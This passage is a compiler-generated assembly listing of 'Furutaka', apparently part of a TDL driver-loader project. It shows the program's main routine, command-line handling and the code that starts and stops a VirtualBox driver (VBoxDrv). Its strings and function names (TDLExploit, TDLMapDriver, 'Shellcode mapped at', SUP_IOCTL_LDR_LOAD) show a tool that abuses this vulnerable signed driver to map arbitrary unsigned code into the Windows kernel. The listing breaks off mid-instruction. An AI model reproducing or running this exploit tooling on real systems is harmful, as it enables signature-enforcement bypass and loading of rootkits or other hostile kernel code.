00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1DA@HAFJFEII@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ CONST SEGMENT ??_C@_1DA@HAFJFEII@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ DB 'L' DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'S', 00H, 'U', 00H DB 'P', 00H, '_', 00H, 'I', 00H, 'O', 00H, 'C', 00H, 'T', 00H, 'L' DB 00H, '_', 00H, 'L', 00H, 'D', 00H, 'R', 00H, '_', 00H, 'F', 00H DB 'R', 00H, 'E', 00H, 'E', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1DG@HDAIEBIB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ CONST SEGMENT ??_C@_1DG@HDAIEBIB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ DB 'L' DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'S', 00H, 'U', 00H DB 'P', 00H, '_', 00H, 'I', 00H, 'O', 00H, 'C', 00H, 'T', 00H, 'L' DB 00H, '_', 00H, 'F', 00H, 'A', 00H, 'S', 00H, 'T', 00H, '_', 00H DB 'D', 00H, 'O', 00H, '_', 00H, 'N', 00H, 'O', 00H, 'P', 00H, 00H DB 00H ; `string' CONST ENDS ; COMDAT ??_C@_1FK@MDOKEACB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ CONST SEGMENT ??_C@_1FK@MDOKEACB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ DB 'L' DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'S', 00H, 'U', 00H DB 'P', 00H, '_', 00H, 'I', 00H, 'O', 00H, 'C', 00H, 'T', 00H, 'L' DB 00H, '_', 00H, 'S', 00H, 'E', 00H, 'T', 00H, '_', 00H, 'V', 00H DB 'M', 00H, '_', 00H, 'F', 00H, 'O', 00H, 'R', 00H, '_', 00H, 'F' DB 00H, 'A', 00H, 'S', 00H, 'T', 00H, ' ', 00H, 'c', 00H, 'a', 00H DB 'l', 00H, 'l', 00H, ' ', 00H, 'c', 00H, 'o', 00H, 'm', 00H, 'p' DB 00H, 'l', 00H, 'e', 00H, 't', 00H, 'e', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1FG@OEMDNKOC@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ CONST SEGMENT ??_C@_1FG@OEMDNKOC@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ DB 'L' DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'S', 00H, 'U', 00H DB 'P', 00H, '_', 00H, 'I', 00H, 'O', 00H, 'C', 00H, 'T', 00H, 'L' DB 00H, '_', 00H, 'S', 00H, 'E', 00H, 'T', 00H, '_', 00H, 'V', 00H DB 'M', 00H, '_', 00H, 'F', 00H, 'O', 00H, 'R', 00H, '_', 00H, 'F' DB 00H, 'A', 00H, 'S', 00H, 'T', 00H, ' ', 00H, 'c', 00H, 'a', 00H DB 'l', 00H, 'l', 00H, ' ', 00H, 'f', 00H, 'a', 00H, 'i', 00H, 'l' DB 00H, 'e', 00H, 'd', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1DK@EPAAGPAO@?$AA?$AN?$AA?6?$AA?7?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAi?$AAm?$AAa?$AAg?$AAe@ CONST SEGMENT ??_C@_1DK@EPAAGPAO@?$AA?$AN?$AA?6?$AA?7?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAi?$AAm?$AAa?$AAg?$AAe@ DB 0dH DB 00H, 0aH, 00H, 09H, 00H, 'D', 00H, 'r', 00H, 'i', 00H, 'v', 00H DB 'e', 00H, 'r', 00H, ' ', 00H, 'i', 00H, 'm', 00H, 'a', 00H, 'g' DB 00H, 'e', 00H, ' ', 00H, 'm', 00H, 'a', 00H, 'p', 00H, 'p', 00H DB 'e', 00H, 'd', 00H, ' ', 00H, 'a', 00H, 't', 00H, ' ', 00H, '0' DB 00H, 'x', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1BI@BLMPOKEB@?$AA?0?$AA?5?$AAs?$AAi?$AAz?$AAe?$AA?5?$AA?$DN?$AA?5?$AA0?$AAx@ CONST SEGMENT ??_C@_1BI@BLMPOKEB@?$AA?0?$AA?5?$AAs?$AAi?$AAz?$AAe?$AA?5?$AA?$DN?$AA?5?$AA0?$AAx@ DB ',' DB 00H, ' ', 00H, 's', 00H, 'i', 00H, 'z', 00H, 'e', 00H, ' ', 00H DB '=', 00H, ' ', 00H, '0', 00H, 'x', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1HE@JFOLDMOA@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ CONST SEGMENT ??_C@_1HE@JFOLDMOA@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ DB 'L' DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'S', 00H, 'U', 00H DB 'P', 00H, '_', 00H, 'I', 00H, 'O', 00H, 'C', 00H, 'T', 00H, 'L' DB 00H, '_', 00H, 'L', 00H, 'D', 00H, 'R', 00H, '_', 00H, 'L', 00H DB 'O', 00H, 'A', 00H, 'D', 00H, ',', 00H, ' ', 00H, 's', 00H, 'u' DB 00H, 'c', 00H, 'c', 00H, 'e', 00H, 's', 00H, 's', 00H, 0dH, 00H DB 0aH, 00H, 09H, 00H, 'S', 00H, 'h', 00H, 'e', 00H, 'l', 00H, 'l' DB 00H, 'c', 00H, 'o', 00H, 'd', 00H, 'e', 00H, ' ', 00H, 'm', 00H DB 'a', 00H, 'p', 00H, 'p', 00H, 'e', 00H, 'd', 00H, ' ', 00H, 'a' DB 00H, 't', 00H, ' ', 00H, '0', 00H, 'x', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1EI@INCHPAGN@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ CONST SEGMENT ??_C@_1EI@INCHPAGN@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ DB 'L' DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'S', 00H, 'U', 00H DB 'P', 00H, '_', 00H, 'I', 00H, 'O', 00H, 'C', 00H, 'T', 00H, 'L' DB 00H, '_', 00H, 'L', 00H, 'D', 00H, 'R', 00H, '_', 00H, 'L', 00H DB 'O', 00H, 'A', 00H, 'D', 00H, ' ', 00H, 'c', 00H, 'a', 00H, 'l' DB 00H, 'l', 00H, ' ', 00H, 'f', 00H, 'a', 00H, 'i', 00H, 'l', 00H DB 'e', 00H, 'd', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1EI@CGOGKFDE@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAO?$AAp?$AAe?$AAn?$AAL?$AAd?$AAr?$AA?4?$AAu?$AA?4@ CONST SEGMENT ??_C@_1EI@CGOGKFDE@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAO?$AAp?$AAe?$AAn?$AAL?$AAd?$AAr?$AA?4?$AAu?$AA?4@ DB 'L' DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'O', 00H, 'p', 00H DB 'e', 00H, 'n', 00H, 'L', 00H, 'd', 00H, 'r', 00H, '.', 00H, 'u' DB 00H, '.', 00H, 'O', 00H, 'u', 00H, 't', 00H, '.', 00H, 'p', 00H DB 'v', 00H, 'I', 00H, 'm', 00H, 'a', 00H, 'g', 00H, 'e', 00H, 'B' DB 00H, 'a', 00H, 's', 00H, 'e', 00H, ' ', 00H, '=', 00H, ' ', 00H DB '0', 00H, 'x', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1EI@FJDONFON@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ CONST SEGMENT ??_C@_1EI@FJDONFON@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ DB 'L' DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'S', 00H, 'U', 00H DB 'P', 00H, '_', 00H, 'I', 00H, 'O', 00H, 'C', 00H, 'T', 00H, 'L' DB 00H, '_', 00H, 'L', 00H, 'D', 00H, 'R', 00H, '_', 00H, 'O', 00H DB 'P', 00H, 'E', 00H, 'N', 00H, ' ', 00H, 'c', 00H, 'a', 00H, 'l' DB 00H, 'l', 00H, ' ', 00H, 'f', 00H, 'a', 00H, 'i', 00H, 'l', 00H DB 'e', 00H, 'd', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_08EFILHJLF@furutaka@ CONST SEGMENT ??_C@_08EFILHJLF@furutaka@ DB 'furutaka', 00H ; `string' CONST ENDS ; COMDAT ??_C@_1EE@GCOPAAPI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ CONST SEGMENT ??_C@_1EE@GCOPAAPI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ DB 'L' DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'S', 00H, 'U', 00H DB 'P', 00H, '_', 00H, 'I', 00H, 'O', 00H, 'C', 00H, 'T', 00H, 'L' DB 00H, '_', 00H, 'C', 00H, 'O', 00H, 'O', 00H, 'K', 00H, 'I', 00H DB 'E', 00H, ' ', 00H, 'c', 00H, 'a', 00H, 'l', 00H, 'l', 00H, ' ' DB 00H, 'f', 00H, 'a', 00H, 'i', 00H, 'l', 00H, 'e', 00H, 'd', 00H DB 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_0BA@FMLBJMJD@The?5Magic?5Word?$CB@ CONST SEGMENT ??_C@_0BA@FMLBJMJD@The?5Magic?5Word?$CB@ DB 'The Magic Word!', 00H ; `string' CONST ENDS ; COMDAT ??_C@_1DG@IHFEMIJJ@?$AAS?$AAo?$AAf?$AAt?$AAw?$AAa?$AAr?$AAe?$AA?2?$AAO?$AAr?$AAa?$AAc?$AAl?$AAe@ CONST SEGMENT ??_C@_1DG@IHFEMIJJ@?$AAS?$AAo?$AAf?$AAt?$AAw?$AAa?$AAr?$AAe?$AA?2?$AAO?$AAr?$AAa?$AAc?$AAl?$AAe@ DB 'S' DB 00H, 'o', 00H, 'f', 00H, 't', 00H, 'w', 00H, 'a', 00H, 'r', 00H DB 'e', 00H, '\', 00H, 'O', 00H, 'r', 00H, 'a', 00H, 'c', 00H, 'l' DB 00H, 'e', 00H, '\', 00H, 'V', 00H, 'i', 00H, 'r', 00H, 't', 00H DB 'u', 00H, 'a', 00H, 'l', 00H, 'B', 00H, 'o', 00H, 'x', 00H, 00H DB 00H ; `string' CONST ENDS ; COMDAT xdata xdata SEGMENT $unwind$TDLMain DD 051501H DD 06a7415H DD 0680115H DD 05006H xdata ENDS ; COMDAT xdata xdata SEGMENT $unwind$TDLProcessCommandLine DD 050f01H DD 04a340fH DD 048010fH DD 07008H xdata ENDS ; COMDAT xdata xdata SEGMENT $unwind$TDLStopVulnerableDriver DD 060f01H DD 0f640fH DD 0e340fH DD 0700bb20fH xdata ENDS ; COMDAT xdata xdata SEGMENT $unwind$TDLStartVulnerableDriver DD 091d01H DD 08f641dH DD 08e341dH DD 088011dH DD 0700cf00eH DD 0500bH xdata ENDS ; COMDAT xdata xdata SEGMENT $unwind$TDLMapDriver DD 0b1f01H DD 058341fH DD 050011fH DD 0e00ef010H DD 0c00ad00cH DD 060077008H DD 05006H xdata ENDS ; COMDAT xdata xdata SEGMENT $unwind$TDLExploit DD 0d2601H DD 06a7426H DD 0696426H DD 0683426H DD 0620126H DD 0e016f018H DD 0c012d014H DD 05010H xdata ENDS ; COMDAT xdata xdata SEGMENT $unwind$TDLResolveKernelImport DD 0c1c01H DD 0c641cH DD 0b541cH DD 0a341cH DD 0f018321cH DD 0d014e016H DD 07010c012H xdata ENDS ; COMDAT xdata xdata SEGMENT $unwind$TDLGetProcAddress DD 040a01H DD 08340aH DD 07006520aH xdata ENDS ; COMDAT xdata xdata SEGMENT $unwind$TDLVBoxInstalled DD 020601H DD 030025206H xdata ENDS ; COMDAT xdata xdata SEGMENT $unwind$RtlSecureZeroMemory DD 020501H DD 017405H xdata ENDS ; Function compile flags: /Ogspy ; COMDAT TDLMain _TEXT SEGMENT osv$ = 32 text$ = 320 TDLMain PROC ; COMDAT ; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c ; Line 734 $LN14: mov QWORD PTR [rsp+8], rdi push rbp lea rbp, QWORD PTR [rsp-576] sub rsp, 832 ; 00000340H ; Line 743 xor ecx, ecx call QWORD PTR __imp_GetModuleHandleW ; Line 745 xor edx, edx xor ecx, ecx mov QWORD PTR g_hInstance, rax call cuiInitialize ; Line 747 lea rcx, OFFSET FLAT:??_C@_1EM@EIBHHECD@?$AAT?$AAu?$AAr?$AAl?$AAa?$AA?5?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAL?$AAo@ call QWORD PTR __imp_SetConsoleTitleW ; Line 749 mov edx, 1 lea rcx, OFFSET FLAT:??_C@_1ME@FJMKDEEO@?$AAT?$AAu?$AAr?$AAl?$AAa?$AA?5?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAL?$AAo@ call cuiPrintTextW ; Line 751 mov eax, 1 lock xadd DWORD PTR g_lApplicationInstances, eax inc eax ; Line 752 cmp eax, 1 jle SHORT $LN5@TDLMain ; Line 753 lea rcx, OFFSET FLAT:??_C@_1FI@KELGEADI@?$AAA?$AAn?$AAo?$AAt?$AAh?$AAe?$AAr?$AA?5?$AAi?$AAn?$AAs?$AAt?$AAa?$AAn?$AAc@ $LN13@TDLMain: ; Line 791 xor edx, edx call cuiPrintTextW or eax, -1 ; ffffffffH jmp $LN3@TDLMain $LN5@TDLMain: ; File C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\winnt.h ; Line 20225 mov edx, 276 ; 00000114H lea rdi, QWORD PTR osv$[rsp] mov ecx, edx xor eax, eax rep stosb ; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c ; Line 761 lea rcx, QWORD PTR osv$[rsp] mov DWORD PTR osv$[rsp], edx call QWORD PTR __imp_RtlGetVersion ; Line 762 cmp DWORD PTR osv$[rsp+4], 6 jae SHORT $LN6@TDLMain ; Line 763 lea rcx, OFFSET FLAT:??_C@_1DI@DFEFPEIF@?$AAU?$AAn?$AAs?$AAu?$AAp?$AAp?$AAo?$AAr?$AAt?$AAe?$AAd?$AA?5?$AAW?$AAi?$AAn@ ; Line 765 jmp SHORT $LN13@TDLMain $LN6@TDLMain: ; Line 768 mov eax, DWORD PTR osv$[rsp+12] ; Line 770 lea rdx, OFFSET FLAT:??_C@_1BO@HKPJGJI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAW?$AAi?$AAn?$AAd?$AAo?$AAw?$AAs?$AA?5?$AAv@ lea rcx, QWORD PTR text$[rbp-256] mov DWORD PTR g_NtBuildNumber, eax call _strcpy_w ; Line 771 lea rcx, QWORD PTR text$[rbp-256] call _strend_w mov ecx, DWORD PTR osv$[rsp+4] mov rdx, rax call ultostr_w ; Line 772 lea rdx, OFFSET FLAT:??_C@_13JOFGPIOO@?$AA?4@ lea rcx, QWORD PTR text$[rbp-256] call _strcat_w ; Line 773 lea rcx, QWORD PTR text$[rbp-256] call _strend_w mov ecx, DWORD PTR osv$[rsp+8] mov rdx, rax call ultostr_w ; Line 774 lea rdx, OFFSET FLAT:??_C@_1BA@EMMAAKIL@?$AA?5?$AAb?$AAu?$AAi?$AAl?$AAd?$AA?5@ lea rcx, QWORD PTR text$[rbp-256] call _strcat_w ; Line 775 lea rcx, QWORD PTR text$[rbp-256] call _strend_w mov ecx, DWORD PTR osv$[rsp+12] mov rdx, rax call ultostr_w ; Line 776 mov edx, 1 lea rcx, QWORD PTR text$[rbp-256] call cuiPrintTextW ; Line 782 call TDLVBoxInstalled mov DWORD PTR g_VBoxInstalled, eax ; Line 783 test eax, eax je SHORT $LN7@TDLMain ; Line 784 mov edx, 1 lea rcx, OFFSET FLAT:??_C@_1JG@OOKLIHEB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAD?$AAe?$AAt?$AAe?$AAc?$AAt?$AAe?$AAd?$AA?5?$AAV@ call cuiPrintTextW $LN7@TDLMain: ; Line 787 call QWORD PTR __imp_GetCommandLineW mov rcx, rax call TDLProcessCommandLine $LN3@TDLMain: ; Line 791 lock dec DWORD PTR g_lApplicationInstances ; Line 792 mov ecx, eax call QWORD PTR __imp_ExitProcess int 3 $LN11@TDLMain: TDLMain ENDP _TEXT ENDS ; Function compile flags: /Ogspy ; COMDAT TDLProcessCommandLine _TEXT SEGMENT szInputFile$ = 48 lpCommandLine$ = 592 c$ = 600 TDLProcessCommandLine PROC ; COMDAT ; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c ; Line 698 $LN11: mov r11, rsp mov QWORD PTR [r11+8], rbx push rdi sub rsp, 576 ; 00000240H ; Line 704 and DWORD PTR [r11+16], 0 ; File C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\winnt.h ; Line 20225 lea rdi, QWORD PTR szInputFile$[rsp] ; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c ; Line 698 mov r10, rcx ; Line 706 lea r8, QWORD PTR szInputFile$[rsp] ; File C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\winnt.h ; Line 20225 xor eax, eax mov ecx, 522 ; 0000020aH rep stosb ; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c ; Line 706 lea rax, QWORD PTR [r11+16] mov rcx, r10 mov r9d, 260 ; 00000104H mov QWORD PTR [rsp+32], rax mov edx, 1 or ebx, -1 ; ffffffffH call GetCommandLineParamW ; Line 707 cmp DWORD PTR c$[rsp], 0 jne SHORT $LN2@TDLProcess ; Line 708 lea rcx, OFFSET FLAT:??_C@_1GI@DHNLBGMJ@?$AAU?$AAs?$AAa?$AAg?$AAe?$AA?3?$AA?5?$AAl?$AAo?$AAa?$AAd?$AAe?$AAr?$AA?5?$AAD@ ; Line 709 jmp SHORT $LN9@TDLProcess $LN2@TDLProcess: ; Line 712 lea rcx, QWORD PTR szInputFile$[rsp] call QWORD PTR __imp_GetFileAttributesW cmp eax, ebx je SHORT $LN3@TDLProcess ; Line 713 call TDLStartVulnerableDriver mov QWORD PTR g_hVBox, rax ; Line 714 cmp rax, -1 je SHORT $LN4@TDLProcess ; Line 715 lea rcx, QWORD PTR szInputFile$[rsp] call TDLMapDriver mov ebx, eax ; Line 716 call TDLStopVulnerableDriver ; Line 718 jmp SHORT $LN4@TDLProcess $LN3@TDLProcess: ; Line 720 lea rcx, OFFSET FLAT:??_C@_1DE@GHKPOPNF@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAI?$AAn?$AAp?$AAu?$AAt?$AA?5?$AAf?$AAi?$AAl?$AAe@ $LN9@TDLProcess: ; Line 723 xor edx, edx call cuiPrintTextW $LN4@TDLProcess: mov eax, ebx mov rbx, QWORD PTR [rsp+592] add rsp, 576 ; 00000240H pop rdi ret 0 TDLProcessCommandLine ENDP _TEXT ENDS ; Function compile flags: /Ogspy ; COMDAT TDLStopVulnerableDriver _TEXT SEGMENT uStr$ = 32 ObjectAttributes$ = 48 TDLStopVulnerableDriver PROC ; COMDAT ; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c ; Line 623 $LN16: mov QWORD PTR [rsp+8], rbx mov QWORD PTR [rsp+16], rsi push rdi sub rsp, 96 ; 00000060H ; Line 629 mov edi, 1 lea rcx, OFFSET FLAT:??_C@_1EC@PNBIDKPH@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAU?$AAn?$AAl?$AAo?$AAa?$AAd?$AAi?$AAn?$AAg?$AA?5@ mov edx, edi call cuiPrintTextW ; Line 631 mov rcx, QWORD PTR g_hVBox cmp rcx, -1 je SHORT $LN2@TDLStopVul ; Line 632 call QWORD PTR __imp_CloseHandle $LN2@TDLStopVul: ; Line 634 xor edx, edx xor ecx, ecx mov r8d, 983103 ; 000f003fH call QWORD PTR __imp_OpenSCManagerW ; Line 639 xor esi, esi mov rbx, rax test rax, rax jne SHORT $LN3@TDLStopVul ; Line 640 mov edx, edi lea rcx, OFFSET FLAT:??_C@_1GA@CFGLDEGI@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAC?$AAa?$AAn?$AAn?$AAo?$AAt?$AA?5?$AAo?$AAp?$AAe@ call cuiPrintTextW ; Line 641 jmp $LN1@TDLStopVul $LN3@TDLStopVul: ; Line 645 lea rdx, OFFSET FLAT:??_C@_1BA@DCGKIPPO@?$AAV?$AAB?$AAo?$AAx?$AAD?$AAr?$AAv@ mov rcx, rbx call scmStopDriver test eax, eax lea r8, OFFSET FLAT:??_C@_1FK@IKAIMODD@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAU?$AAn?$AAe?$AAx?$AAp?$AAe?$AAc?$AAt?$AAe?$AAd@ lea rcx, OFFSET FLAT:??_C@_1FK@JFBCCPOL@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAV?$AAu?$AAl?$AAn?$AAe?$AAr?$AAa?$AAb?$AAl?$AAe@ ; Line 650 mov edx, edi cmove rcx, r8 call cuiPrintTextW ; Line 653 cmp DWORD PTR g_VBoxInstalled, esi jne $LN6@TDLStopVul ; Line 655 lea rdx, OFFSET FLAT:??_C@_1BA@DCGKIPPO@?$AAV?$AAB?$AAo?$AAx?$AAD?$AAr?$AAv@ mov rcx, rbx call scmRemoveDriver lea rdx, OFFSET FLAT:??_C@_1FO@DNLPIHKO@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAr?$AAe?$AAm?$AAo@ test eax, eax lea rcx, OFFSET FLAT:??_C@_1FA@PHCFNMLE@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAe?$AAn?$AAt@ cmove rcx, rdx ; Line 660 mov edx, edi call cuiPrintTextW ; Line 665 lea rdx, OFFSET FLAT:??_C@_1GO@OPJFPMDE@?$AA?2?$AA?$DP?$AA?$DP?$AA?2?$AAg?$AAl?$AAo?$AAb?$AAa?$AAl?$AAr?$AAo?$AAo?$AAt?$AA?2@ mov QWORD PTR uStr$[rsp+8], rsi lea rcx, QWORD PTR uStr$[rsp] mov DWORD PTR uStr$[rsp], esi call QWORD PTR __imp_RtlInitUnicodeString ; Line 666 lea rax, QWORD PTR uStr$[rsp] mov DWORD PTR ObjectAttributes$[rsp], 48 ; 00000030H xorps xmm0, xmm0 mov QWORD PTR ObjectAttributes$[rsp+16], rax ; Line 667 lea rcx, QWORD PTR ObjectAttributes$[rsp] mov QWORD PTR ObjectAttributes$[rsp+8], rsi movdqu XMMWORD PTR ObjectAttributes$[rsp+32], xmm0 mov DWORD PTR ObjectAttributes$[rsp+24], 64 ; 00000040H call QWORD PTR __imp_NtDeleteFile test eax, eax lea rcx, OFFSET FLAT:??_C@_1DC@DNGHMHCN@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAf?$AAi?$AAl@ lea rdx, OFFSET FLAT:??_C@_1EA@GBOCHCBM@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAr?$AAe?$AAm?$AAo@ cmovs rcx, rdx ; Line 674 jmp SHORT $LN12@TDLStopVul $LN6@TDLStopVul: ; Line 677 mov ecx, edi call supBackupVBoxDrv test eax, eax lea rcx, OFFSET FLAT:??_C@_1GK@NPKGCMED@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAO?$AAr?$AAi?$AAg?$AAi?$AAn?$AAa?$AAl?$AA?5?$AAV@ lea rdx, OFFSET FLAT:??_C@_1IE@LNHNMFMD@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAU?$AAn?$AAe?$AAx?$AAp?$AAe?$AAc?$AAt?$AAe?$AAd@ cmove rcx, rdx $LN12@TDLStopVul: ; Line 684 mov edx, edi call cuiPrintTextW mov rcx, rbx call QWORD PTR __imp_CloseServiceHandle $LN1@TDLStopVul: ; Line 685 mov rbx, QWORD PTR [rsp+112] mov rsi, QWORD PTR [rsp+120] add rsp, 96 ; 00000060H pop rdi ret 0 TDLStopVulnerableDriver ENDP _TEXT ENDS ; Function compile flags: /Ogspy ; COMDAT TDLStartVulnerableDriver _TEXT SEGMENT szDriverFileName$ = 48 DataSize$ = 1120 hDevice$ = 1128 TDLStartVulnerableDriver PROC ; COMDAT ; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c ; Line 501 $LN28: mov QWORD PTR [rsp+24], rbx mov QWORD PTR [rsp+32], rsi push rbp push rdi push r15 lea rbp, QWORD PTR [rsp-832] sub rsp, 1088 ; 00000440H ; Line 510 mov rdx, QWORD PTR g_hInstance lea r8, QWORD PTR DataSize$[rbp-256] and DWORD PTR DataSize$[rbp-256], 0 or rdi, -1 mov QWORD PTR hDevice$[rbp-256], rdi xor ebx, ebx lea r15d, QWORD PTR [rdi+2] mov ecx, r15d call supQueryResourceData mov rsi, rax ; Line 511 test rax, rax jne SHORT $LN4@TDLStartVu ; Line 512 mov rax, rdi jmp $LN1@TDLStartVu $LN4@TDLStartVu: ; File C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\winnt.h ; Line 20225 xor eax, eax lea rdi, QWORD PTR szDriverFileName$[rsp] mov ecx, 1040 ; 00000410H ; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c ; Line 518 mov edx, 260 ; 00000104H ; File C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\winnt.h ; Line 20225 rep stosb ; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c ; Line 518 lea rcx, QWORD PTR szDriverFileName$[rsp] call QWORD PTR __imp_GetSystemDirectoryW test eax, eax jne SHORT $LN6@TDLStartVu ; Line 519 lea rcx, OFFSET FLAT:??_C@_1IA@JHBCJNPH@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAl?$AAo?$AAa?$AAd@ ; Line 520 jmp $LN3@TDLStartVu $LN6@TDLStartVu: ; Line 523 xor edx, edx xor ecx, ecx mov r8d, 983103 ; 000f003fH call QWORD PTR __imp_OpenSCManagerW mov rbx, rax ; Line 524 test rax, rax jne SHORT $LN7@TDLStartVu ; Line 525 lea rcx, OFFSET FLAT:??_C@_1EA@CCBNBOB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAo?$AAp?$AAe?$AAn@ ; Line 526 jmp $LN3@TDLStartVu $LN7@TDLStartVu: ; Line 532 lea rdi, OFFSET FLAT:??_C@_1BA@DCGKIPPO@?$AAV?$AAB?$AAo?$AAx?$AAD?$AAr?$AAv@ mov rdx, rdi lea rcx, OFFSET FLAT:??_C@_1BA@CCLAPIHO@?$AA?2?$AAD?$AAe?$AAv?$AAi?$AAc?$AAe@ call supIsObjectExists test al, al je $LN12@TDLStartVu ; Line 534 mov edx, r15d lea rcx, OFFSET FLAT:??_C@_1JC@BFFFCFPE@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAA?$AAc?$AAt?$AAi?$AAv?$AAe?$AA?5?$AAV?$AAi?$AAr@ call cuiPrintTextW ; Line 536 lea rdx, OFFSET FLAT:??_C@_1BG@OGKIPLPP@?$AAV?$AAB?$AAo?$AAx?$AAU?$AAS?$AAB?$AAM?$AAo?$AAn@ mov rcx, rbx call supStopVBoxService test al, al jne SHORT $LN9@TDLStartVu ; Line 537 lea rcx, OFFSET FLAT:??_C@_1GA@EGOCKGIF@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAs?$AAt?$AAo?$AAp@ ; Line 538 jmp $LN3@TDLStartVu $LN9@TDLStartVu: ; Line 541 lea rdx, OFFSET 